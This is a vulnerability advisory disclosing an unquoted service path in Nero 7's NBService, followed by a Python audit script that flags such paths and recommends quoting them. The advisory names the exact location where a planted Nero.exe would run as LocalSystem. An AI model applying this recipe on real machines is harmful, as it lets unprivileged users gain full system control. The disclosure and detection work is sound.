# Exploit Title: Nero 7 Unquoted Service Path Elevation Of Privilege
# Disclosure Date: 09/11/2016
# Exploit Author: Boumediene KADDOUR a.k.a Sh311c0d3r
# http://www.realistic-security.org
# Version: Nero version 7.10.1.0
# Tested on: Windows 7 integral edition FR
# CVE : N/A

Vulnerability Details:
=====================

Nero 7 suffers from an unquoted search path issue impacting the service "NBService", leading to arbitrary code execution. This could potentially allow an authorized unprivileged user to invoke a malicious piece of code with elevated privileges. A successful exploit requires a local user to put their own code in the path of the vulnerable application, where it could potentially be executed during the software startup or system reboot.

PoC
--

[PentestingSkills.BlackBox] > sc qc NBService
[SC] QueryServiceConfig réussite(s)

SERVICE_NAME: NBService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Nero\Nero 7\Nero BackItUp\NBService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : NBService
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem

Notice that the path C:\Program Files (x86)\Nero\Nero 7\Nero BackItUp\NBService.exe is unquoted. A malicious local user could put in place their own executable as Nero.exe under C:\Program Files (x86)\Nero\ to be then executed once the application starts up or the system reboots.

sh311c0d3r
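
An audit-side view of the finding above, as an added example that is not part of the original advisory: it parses `sc qc` output, flags an unquoted image path containing spaces, and lists the locations Windows would try before the intended binary so their directory ACLs can be reviewed. The function names are hypothetical and the sample input is constructed from the output quoted in the advisory.

```python
import re

# Constructed sample: the `sc qc NBService` fields quoted in the advisory above.
SAMPLE_SC_QC = r"""
SERVICE_NAME: NBService
        START_TYPE         : 3   DEMAND_START
        BINARY_PATH_NAME   : C:\Program Files (x86)\Nero\Nero 7\Nero BackItUp\NBService.exe
        SERVICE_START_NAME : LocalSystem
"""


def binary_path(sc_qc_output):
    """Return the raw BINARY_PATH_NAME value from `sc qc` output, or None."""
    m = re.search(r"^\s*BINARY_PATH_NAME\s*:\s*(.+?)\s*$", sc_qc_output, re.M)
    return m.group(1) if m else None


def image_part(path):
    """Cut the command line at the first ".exe" so arguments are ignored."""
    m = re.match(r"(.*?\.exe)\b", path, re.I)
    return m.group(1) if m else path


def is_unquoted_with_spaces(path):
    """True when the image path contains a space and is not quoted."""
    return not path.startswith('"') and " " in image_part(path)


def candidate_images(path):
    """Images Windows tries, in order, before the intended one.

    With an unquoted path every space may end the program name; ".exe" is
    appended when the last component of that prefix has no extension.
    """
    if not is_unquoted_with_spaces(path):
        return []
    image, out = image_part(path), []
    for i, ch in enumerate(image):
        if ch == " ":
            prefix = image[:i]
            has_ext = "." in prefix.rsplit("\\", 1)[-1]
            out.append(prefix if has_ext else prefix + ".exe")
    return out


if __name__ == "__main__":
    path = binary_path(SAMPLE_SC_QC)
    print("unquoted:", is_unquoted_with_spaces(path))
    for candidate in candidate_images(path):
        print("check ACL on parent of:", candidate)
```

On a live host, feed it the output of `sc qc <service>`; any listed location whose parent directory is writable by non-administrators needs its ACL tightened. The durable fix is to wrap the service's image path in quotes.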